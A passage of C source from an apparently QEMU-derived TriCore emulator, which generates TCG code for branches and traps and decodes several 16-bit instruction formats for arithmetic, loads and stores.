(use_goto_tb(ctx, dest)) { tcg_gen_goto_tb(tcg_ctx, n); gen_save_pc(ctx, dest); tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { gen_save_pc(ctx, dest); tcg_gen_lookup_and_goto_ptr(tcg_ctx); } 
} static void generate_trap(DisasContext *ctx, int class, int tin) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 classtemp = tcg_const_i32(tcg_ctx, class); TCGv_i32 tintemp = tcg_const_i32(tcg_ctx, tin); gen_save_pc(ctx, ctx->base.pc_next); gen_helper_raise_exception_sync(tcg_ctx, tcg_ctx->cpu_env, classtemp, tintemp); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, classtemp); tcg_temp_free(tcg_ctx, tintemp); } static inline void gen_branch_cond(DisasContext *ctx, TCGCond cond, TCGv r1, TCGv r2, int16_t address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *jumpLabel = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, cond, r1, r2, jumpLabel); gen_goto_tb(ctx, 1, ctx->pc_succ_insn); gen_set_label(tcg_ctx, jumpLabel); gen_goto_tb(ctx, 0, ctx->base.pc_next + address * 2); } static inline void gen_branch_condi(DisasContext *ctx, TCGCond cond, TCGv r1, int r2, int16_t address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, r2); gen_branch_cond(ctx, cond, r1, temp, address); tcg_temp_free(tcg_ctx, temp); } static void gen_loop(DisasContext *ctx, int r1, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r1], 1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], -1, l1); gen_goto_tb(ctx, 1, ctx->base.pc_next + offset); gen_set_label(tcg_ctx, l1); gen_goto_tb(ctx, 0, ctx->pc_succ_insn); } static void gen_fcall_save_ctx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[10], -4); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], temp, ctx->mem_idx, MO_LESL); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[10], temp); tcg_temp_free(tcg_ctx, temp); } static void gen_fret(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_a[11], ~0x1); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], tcg_ctx->cpu_gpr_a[10], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[10], tcg_ctx->cpu_gpr_a[10], 4); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PC, temp); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, temp); } static void gen_compute_branch(DisasContext *ctx, uint32_t opc, int r1, int r2 , int32_t constant , int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp, temp2; int n; switch (opc) { /* SB-format jumps */ case OPC1_16_SB_J: case OPC1_32_B_J: gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; case OPC1_32_B_CALL: case OPC1_16_SB_CALL: gen_helper_1arg(tcg_ctx, call, ctx->pc_succ_insn); gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; case OPC1_16_SB_JZ: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], 0, offset); break; case OPC1_16_SB_JNZ: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[15], 0, offset); break; /* SBC-format jumps */ case OPC1_16_SBC_JEQ: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], constant, offset); break; case OPC1_16_SBC_JEQ2: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], constant, offset + 16); break; case OPC1_16_SBC_JNE: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[15], constant, offset); break; case OPC1_16_SBC_JNE2: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[15], constant, offset + 16); break; /* 
SBRN-format jumps */ case OPC1_16_SBRN_JZ_T: temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[15], 0x1u << constant); gen_branch_condi(ctx, TCG_COND_EQ, temp, 0, offset); tcg_temp_free(tcg_ctx, temp); break; case OPC1_16_SBRN_JNZ_T: temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[15], 0x1u << constant); gen_branch_condi(ctx, TCG_COND_NE, temp, 0, offset); tcg_temp_free(tcg_ctx, temp); break; /* SBR-format jumps */ case OPC1_16_SBR_JEQ: gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset); break; case OPC1_16_SBR_JEQ2: gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset + 16); break; case OPC1_16_SBR_JNE: gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset); break; case OPC1_16_SBR_JNE2: gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], offset + 16); break; case OPC1_16_SBR_JNZ: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JNZ_A: gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_a[r1], 0, offset); break; case OPC1_16_SBR_JGEZ: gen_branch_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JGTZ: gen_branch_condi(ctx, TCG_COND_GT, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JLEZ: gen_branch_condi(ctx, TCG_COND_LE, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JLTZ: gen_branch_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JZ: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], 0, offset); break; case OPC1_16_SBR_JZ_A: gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], 0, offset); break; case OPC1_16_SBR_LOOP: gen_loop(ctx, r1, offset * 2 - 32); break; /* SR-format jumps */ case OPC1_16_SR_JI: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_PC, tcg_ctx->cpu_gpr_a[r1], 0xfffffffe); tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case OPC2_32_SYS_RET: case OPC2_16_SR_RET: gen_helper_ret(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; /* B-format */ case OPC1_32_B_CALLA: gen_helper_1arg(tcg_ctx, call, ctx->pc_succ_insn); gen_goto_tb(ctx, 0, EA_B_ABSOLUT(offset)); break; case OPC1_32_B_FCALL: gen_fcall_save_ctx(ctx); gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; case OPC1_32_B_FCALLA: gen_fcall_save_ctx(ctx); gen_goto_tb(ctx, 0, EA_B_ABSOLUT(offset)); break; case OPC1_32_B_JLA: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); /* fall through */ case OPC1_32_B_JA: gen_goto_tb(ctx, 0, EA_B_ABSOLUT(offset)); break; case OPC1_32_B_JL: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[11], ctx->pc_succ_insn); gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); break; /* BOL format */ case OPCM_32_BRC_EQ_NEQ: if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRC_JEQ) { gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], constant, offset); } else { gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], constant, offset); } break; case OPCM_32_BRC_GE: if (MASK_OP_BRC_OP2(ctx->opcode) == OP2_32_BRC_JGE) { gen_branch_condi(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r1], constant, offset); } else { constant = MASK_OP_BRC_CONST4(ctx->opcode); gen_branch_condi(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r1], constant, offset); } break; case OPCM_32_BRC_JLT: if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRC_JLT) { gen_branch_condi(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r1], constant, offset); } else { constant = 
MASK_OP_BRC_CONST4(ctx->opcode); gen_branch_condi(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r1], constant, offset); } break; case OPCM_32_BRC_JNE: temp = tcg_temp_new(tcg_ctx); if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRC_JNED) { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* subi is unconditional */ tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_condi(ctx, TCG_COND_NE, temp, constant, offset); } else { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* addi is unconditional */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_condi(ctx, TCG_COND_NE, temp, constant, offset); } tcg_temp_free(tcg_ctx, temp); break; /* BRN format */ case OPCM_32_BRN_JTT: n = MASK_OP_BRN_N(ctx->opcode); temp = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], (1 << n)); if (MASK_OP_BRN_OP2(ctx->opcode) == OPC2_32_BRN_JNZ_T) { gen_branch_condi(ctx, TCG_COND_NE, temp, 0, offset); } else { gen_branch_condi(ctx, TCG_COND_EQ, temp, 0, offset); } tcg_temp_free(tcg_ctx, temp); break; /* BRR Format */ case OPCM_32_BRR_EQ_NEQ: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JEQ) { gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } break; case OPCM_32_BRR_ADDR_EQ_NEQ: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JEQ_A) { gen_branch_cond(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], offset); } break; case OPCM_32_BRR_GE: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JGE) { gen_branch_cond(ctx, TCG_COND_GE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_GEU, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } break; case OPCM_32_BRR_JLT: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JLT) { gen_branch_cond(ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } else { gen_branch_cond(ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], offset); } break; case OPCM_32_BRR_LOOP: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_LOOP) { gen_loop(ctx, r2, offset * 2); } else { /* OPC2_32_BRR_LOOPU */ gen_goto_tb(ctx, 0, ctx->base.pc_next + offset * 2); } break; case OPCM_32_BRR_JNE: temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); if (MASK_OP_BRC_OP2(ctx->opcode) == OPC2_32_BRR_JNED) { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* also save r2, in case of r1 == r2, so r2 is not decremented */ tcg_gen_mov_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); /* subi is unconditional */ tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_cond(ctx, TCG_COND_NE, temp, temp2, offset); } else { tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); /* also save r2, in case of r1 == r2, so r2 is not decremented */ tcg_gen_mov_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); /* addi is unconditional */ tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 1); gen_branch_cond(ctx, TCG_COND_NE, temp, temp2, offset); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPCM_32_BRR_JNZ: if (MASK_OP_BRR_OP2(ctx->opcode) == OPC2_32_BRR_JNZ_A) { gen_branch_condi(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_a[r1], 0, offset); } else { gen_branch_condi(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_a[r1], 0, 
offset); } break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } ctx->base.is_jmp = DISAS_NORETURN; } /* * Functions for decoding instructions */ static void decode_src_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1; int32_t const4; TCGv temp, temp2; r1 = MASK_OP_SRC_S1D(ctx->opcode); const4 = MASK_OP_SRC_CONST4_SEXT(ctx->opcode); switch (op1) { case OPC1_16_SRC_ADD: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_ADD_A15: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], const4); break; case OPC1_16_SRC_ADD_15A: gen_addi_d(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_ADD_A: tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r1], const4); break; case OPC1_16_SRC_CADD: gen_condi_add(ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], const4, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15]); break; case OPC1_16_SRC_CADDN: gen_condi_add(ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], const4, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15]); break; case OPC1_16_SRC_CMOV: temp = tcg_const_tl(tcg_ctx, 0); temp2 = tcg_const_tl(tcg_ctx, const4); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, temp2, tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC1_16_SRC_CMOVN: temp = tcg_const_tl(tcg_ctx, 0); temp2 = tcg_const_tl(tcg_ctx, const4); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, temp2, tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; case OPC1_16_SRC_EQ: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_LT: tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_MOV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_MOV_A: const4 = MASK_OP_SRC_CONST4(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], const4); break; case OPC1_16_SRC_MOV_E: if (has_feature(ctx, TRICORE_FEATURE_16)) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], const4); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], 31); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_16_SRC_SH: gen_shi(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], const4); break; case OPC1_16_SRC_SHA: gen_shaci(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], const4); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_srr_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; TCGv temp; r1 = MASK_OP_SRR_S1D(ctx->opcode); r2 = MASK_OP_SRR_S2(ctx->opcode); switch (op1) { case OPC1_16_SRR_ADD: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_ADD_A15: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_ADD_15A: gen_add_d(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_ADD_A: tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC1_16_SRR_ADDS: gen_adds(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_AND: tcg_gen_and_tl(tcg_ctx, 
tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_CMOV: temp = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); break; case OPC1_16_SRR_CMOVN: temp = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], temp, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1]); tcg_temp_free(tcg_ctx, temp); break; case OPC1_16_SRR_EQ: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_LT: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_MOV: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_MOV_A: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_MOV_AA: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC1_16_SRR_MOV_D: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2]); break; case OPC1_16_SRR_MUL: gen_mul_i32s(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_OR: tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUB: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUB_A15B: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUB_15AB: gen_sub_d(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_SUBS: gen_subs(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; case OPC1_16_SRR_XOR: tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_ssr_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; r1 = MASK_OP_SSR_S1(ctx->opcode); r2 = MASK_OP_SSR_S2(ctx->opcode); switch (op1) { case OPC1_16_SSR_ST_A: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); break; case OPC1_16_SSR_ST_A_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; case OPC1_16_SSR_ST_B: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); break; case OPC1_16_SSR_ST_B_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 1); break; case OPC1_16_SSR_ST_H: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); break; case OPC1_16_SSR_ST_H_POSTINC: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 2); break; case OPC1_16_SSR_ST_W: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); break; case OPC1_16_SSR_ST_W_POSTINC: 
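        /* ST.W with post-increment: store d[r1] to [a[r2]], then a[r2] += 4 */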
tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LEUL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sc_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t const16; const16 = MASK_OP_SC_CONST8(ctx->opcode); switch (op1) { case OPC1_16_SC_AND: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[15], const16); break; case OPC1_16_SC_BISR: gen_helper_1arg(tcg_ctx, bisr, const16 & 0xff); break; case OPC1_16_SC_LD_A: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_LD_W: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_MOV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[15], const16); break; case OPC1_16_SC_OR: tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_d[15], const16); break; case OPC1_16_SC_ST_A: gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_ST_W: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[10], const16 * 4, MO_LESL); break; case OPC1_16_SC_SUB_A: tcg_gen_subi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[10], tcg_ctx->cpu_gpr_a[10], const16); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_slr_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r1, r2; r1 = MASK_OP_SLR_D(ctx->opcode); r2 = MASK_OP_SLR_S2(ctx->opcode); switch (op1) { /* SLR-format */ case OPC1_16_SLR_LD_A: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); break; case OPC1_16_SLR_LD_A_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; case OPC1_16_SLR_LD_BU: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); break; case OPC1_16_SLR_LD_BU_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_UB); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 1); break; case OPC1_16_SLR_LD_H: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESW); break; case OPC1_16_SLR_LD_H_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESW); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 2); break; case OPC1_16_SLR_LD_W: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); break; case OPC1_16_SLR_LD_W_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; 